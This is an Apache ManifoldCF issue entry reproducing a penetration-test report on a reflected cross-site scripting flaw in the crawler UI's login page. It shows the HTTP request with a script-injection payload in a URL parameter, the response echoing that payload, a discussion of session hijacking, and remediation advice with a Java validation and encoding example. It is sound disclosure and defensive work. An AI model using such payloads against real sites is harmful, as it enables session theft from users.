Details
- Improvement
- Status: Resolved
- Minor
- Resolution: Fixed
- ManifoldCF 2.12
- None
Description
This is the full report of a penetration test performed at a client where we deployed a system which uses ManifoldCF:
Summary
A reflected cross-site scripting vulnerability was discovered in the application.
Reflected cross-site scripting occurs when a web application displays data submitted by the user that
contains HTML markup and scripting code without properly escaping it. An attacker will create a link to the
vulnerable page that will display JavaScript code crafted by the attacker. The attacker will then trick an
authenticated application user into clicking or following this crafted link. When the user's browser parses the
generated page, it will execute the code crafted by the attacker. If the user was logged in to the application
when he followed the link, the attacker's code could perform any action in the application that the user can
perform.
Impact
Reflected cross-site scripting can be used by attackers to compromise the session of an authenticated user.
By persuading the victim to click on a specially crafted link, the attacker can execute his own JavaScript
payload in the browser context of the victim. In this specific case, an attacker could hijack the victim's session,
given that the session token is not flagged as HttpOnly, as demonstrated in [G190204T1F4][MANIFOLD]
Insecure Cookie Configuration.
Additional attacks exist where an attacker can deceive end users of the application by redirecting them to
replica sites or trick them into downloading trojans or other malware. The attacker can also use a so-called
browser exploitation framework. In this scenario the attacker injects JavaScript code that communicates with
the attack framework running on the attacker's computer. When the victim user executes the JavaScript code,
the attacker can control the victim's browser. Publicly available frameworks exist (BeEF -
http://www.bindshell.net/tools/beef, Backframe - http://www.gnucitizen.org/projects/backframe/, XSS Proxy -
http://xss-proxy.sourceforge.net/).
Affected Systems
- https://els-manifold-uat.bc:8475/mcf-crawler-ui/ [name of an arbitrarily supplied URL parameter]
Description
A case where the application includes user input into the generated HTML pages without properly escaping
the user supplied data was discovered in the application. The HTTP requests and responses shown below
demonstrate the problem.
GET /mcf-crawler-ui/?smafi"><script>alert(1)</script>non7x=1 HTTP/1.1
Host: els-manifold-uat.bc:8475
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: JSESSIONID=ov3qae9biucxdat0xiin5s18

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Mon, 18 Feb 2019 13:07:02 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 2576
Connection: close
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
max-age: Thu, 01 Jan 1970 00:00:00 GMT

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta content='width=device-width, initial-scale=1, maximum-scale=1, userscalable= no' name='viewport'>
<link href="css/font-awesome.min.css" rel="stylesheet" type="text/css"/>
<link href="bootstrap/css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link rel="StyleSheet" href="css/style.css" type="text/css" media="screen"/>
<title>Apache ManifoldCF™ Login</title>
<script type="text/javascript">
<!--
function login() { document.loginform.submit(); }
document.onkeypress = loginKeyPress;
function loginKeyPress(e) { e = e || window.event; if (e.keyCode == 13) { document.getElementById('buttonLogin').click(); return false; } return true; }
//-->
</script>
</head>
<body class="login-page">
<div class="login-box">
<div class="login-logo">
<a href="/"><img src="ManifoldCF-logo.png"/></a>
</div>
<!-- /.login-logo -->
<div class="login-box-body">
<p class="login-box-msg">Sign in to start your session</p>
<form class="standardform" name="loginform" action="setupAdminProfile.jsp" method="POST">
<input type="hidden" name="nextUrl" value="index.jsp?smafi"><script>alert(1)</script>non7x=1">
<div class="form-group has-feedback">
--snip--
Recommendations
We recommend that the application enforces proper validation on user input. In most situations where user-controllable
data is copied into application responses, cross-site scripting attacks can be prevented using two
layers of defenses:
- Input should be validated as strictly as possible on arrival, given the kind of content which it is
expected to contain. For example, personal names should consist of alphabetical and a small range
of typographical characters, and be relatively short; a year of birth should consist of exactly four
numerals; email addresses should match a well-defined regular expression. Input which fails the
validation should be rejected, not sanitized.
- User input should be HTML-encoded at any point where it is copied into application responses. All
HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML
entities (&lt; &gt; etc.).
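The following Java is an added illustration of those two layers applied to the reflected nextUrl value from the response above; it is not ManifoldCF's own code, and the class name, the allow-list regular expression and the fallback page "index.jsp" are assumptions made for the example.

```java
import java.util.regex.Pattern;

// Added example, not ManifoldCF's own code: the two defenses from the
// recommendations applied to the reflected nextUrl parameter.
public class NextUrlHardening {
    // Layer 1: assumed allow-list for nextUrl, a relative .jsp page with a
    // simple query string. Anything else is rejected, not sanitized.
    private static final Pattern SAFE_NEXT_URL =
        Pattern.compile("^[A-Za-z0-9_\\-]+\\.jsp(\\?[A-Za-z0-9_\\-=&]*)?$");

    public static boolean isValidNextUrl(String value) {
        return value != null && value.length() <= 512 && SAFE_NEXT_URL.matcher(value).matches();
    }

    // Layer 2: replace every HTML metacharacter (& < > " ' =) with its
    // entity before the value is copied into an attribute.
    public static String encodeAttribute(String value) {
        StringBuilder sb = new StringBuilder(value.length());
        for (char c : value.toCharArray()) {
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                case '=':  sb.append("&#61;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // The pattern seen in the response above: raw input inside value="...".
    public static String hiddenInputUnsafe(String nextUrl) {
        return "<input type=\"hidden\" name=\"nextUrl\" value=\"" + nextUrl + "\">";
    }

    // Hardened form: validate first, then encode whatever is echoed back.
    public static String hiddenInputSafe(String nextUrl) {
        String target = isValidNextUrl(nextUrl) ? nextUrl : "index.jsp"; // assumed fallback page
        return "<input type=\"hidden\" name=\"nextUrl\" value=\"" + encodeAttribute(target) + "\">";
    }

    public static void main(String[] args) {
        String payload = "index.jsp?smafi\"><script>alert(1)</script>non7x=1";
        System.out.println(hiddenInputUnsafe(payload));   // the quote closes the attribute, script lands in the page
        System.out.println(encodeAttribute(payload));     // layer 2 alone: quotes and angle brackets become entities
        System.out.println(hiddenInputSafe(payload));     // layer 1 rejects the value, fallback page is rendered
        System.out.println(hiddenInputSafe("index.jsp?tab=jobs")); // passes the allow-list, then gets encoded
    }
}
```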
References
- OWASP – Cross-site scripting - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)